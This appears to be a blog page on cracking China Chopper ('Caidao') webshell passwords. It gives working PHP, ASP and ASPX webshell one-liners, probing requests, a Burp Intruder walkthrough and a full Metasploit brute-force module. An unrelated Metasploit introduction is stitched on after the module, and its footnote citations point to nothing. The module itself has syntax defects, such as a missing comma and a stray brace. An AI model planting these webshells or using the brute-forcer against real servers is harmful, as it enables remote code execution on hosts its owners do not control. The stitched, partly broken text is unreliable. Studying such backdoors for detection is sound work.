Metasploit - crack chinese caidao php backdoor

本文介绍如何使用Burp Suite及Metasploit等工具破解PHP、ASP和ASPX类型的Caidao后门,并通过实例演示如何逐步破解Caidao PHP后门。

Backdoor Request


PHP Backdoor:

    <?php @eval($_POST["OP"]);?>

HTTP Request:
    POST /bk.php
    ....
    op=phpinfo();

If it's successful, phpinfo page will show us.
ASP Backdoor:
    <%eval request("op")%>

HTTP Request:
    POST /bk.asp
    op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response.    end")

If it's successful, 'woo5woo' page will show us.
ASPX Backdoor:
    <%@ Page Language="Jscript"%><%eval(Request.Item["op"],"unsafe");%>


HTTP Request:
    POST /bk.aspx
    op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")

If it's successful, 'woo5woo' page will show us.


Crack a php backdoor


For Example, we will crack caidao php backdoor step by step.

1. We create a html login form to learn how to use php backdoor.

Press  the lable called "Click Here", we will see HTTP request in burpsuite.

send it to intruder, and make "adminadmin" as a intruder variable.

Bingo ! The password is 'adminadmin'. Now we can do it with metasploit as follow.

Crack backdoors with metasploit


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chinese Caidao Backdoor Bruteforce',
      'Description'    => 'This module attempts to brute chinese caidao php/asp/aspx backdoor.',
      'Author'         => [ 'Nixawk' ],
      'References'     => 
        [
              [ 'URL', 'http://blog.youkuaiyun.com/nixawk/article/details/40430329']
        ],
      'License'        => MSF_LICENSE
    ))

    register_options([
      OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),
      OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ])
      OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])
    ], self.class)

    register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
  end

  def backdoor_brute(uri, user, pass, payload, match)
    begin
      data = "&user=#{user}&#{pass}=#{payload}"
      res = send_request_cgi({
          'uri'          =>  uri,
          'method'       =>  "POST",
          'data'         =>  "#{data}"
      })

    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEOUT
      print_error("#{peer} - Service failed to respond")
      return :abort

    end

    print_status("#{peer} - brute force caidao password: \"#{pass}\"")

    if res and res.code == 200 and res.body =~ /#{match}/mi
        print_good("#{peer} - Successful login: password - \"#{pass}\"")

        return :next_user
    end

    return
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path)
    script_type = datastore['TYPE']

    junk = Rex::Text::rand_text_alphanumeric(4)
    match = "#{junk}4#{junk}"

    case script_type
    when /php$/mi
      payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";";

    when /asp$/mi
      payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"

    when /aspx$/mi
      payload = "Response.Write(\"#{junk}\");Response.Write(Len(\"#{junk}\")});Response.Write(\"#{junk}\")"

    else
      print_error("#{peer} - Backddor type is not support")
      return
    end

    each_user_pass { |user, pass|
      backdoor_brute(uri, user, pass, payload, match)
    }
  end
end  


### Metasploit 的简介与使用指南 #### 安装 Metasploit Metasploit 可以通过多种方式安装,具体取决于操作系统的选择。以下是针对不同平台的安装方法: - **在 Termux 中安装 Metasploit**: 如果您计划在 Android 设备上的 Termux 应用程序中安装 Metasploit,则可以参考该项目地址中的说明[^1]。该指南提供了详细的步骤来完成安装过程。 - **在 Ubuntu 上安装 Metasploit**: 针对基于 Linux 的系统(如 Ubuntu),可以通过官方文档或者社区贡献的脚本来实现快速部署。对于 Ubuntu 18.04 LTS 用户而言,推荐的方法是采用自动化脚本简化配置流程[^5]。如果不想依赖 Rapid7 提供的服务,也可以手动编译源码构建自定义版本。 #### 基础命令介绍 掌握一些基础命令有助于初学者更好地理解如何操作 Metasploit 框架: - `show` 命令用于展示不同类型的功能模块列表,比如可用的 exploit 和 payload 列表等[^2]: ```bash msfconsole> show exploits msfconsole> show payloads ``` - 使用 `search` 来查找特定条件下的模块或功能: ```bash msfconsole> search type:exploit platform:windows ``` #### 渗透测试实践注意事项 当运用 Metasploit 执行实际场景下的渗透测试活动时,请务必遵循法律规范并保持职业道德标准[^3]: - 确保已得到目标系统的正式许可再开展任何类型的评估工作。 - 测试完成后需提交详尽的结果分析报告给客户方知晓潜在风险状况及其缓解措施方案。 #### 学习资料获取途径 为了深入学习有关 Metasploit 技术知识,《Metasploit渗透测试指南(全).pdf》是一份非常有价值的参考资料[^4]。它涵盖了从入门到高级的各种主题讲解,适合不同程度的学习者查阅研究。 ```python # 示例 Python 脚本片段演示如何调用 subprocess 模块启动 MSFConsole import subprocess subprocess.run(["msfconsole"]) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值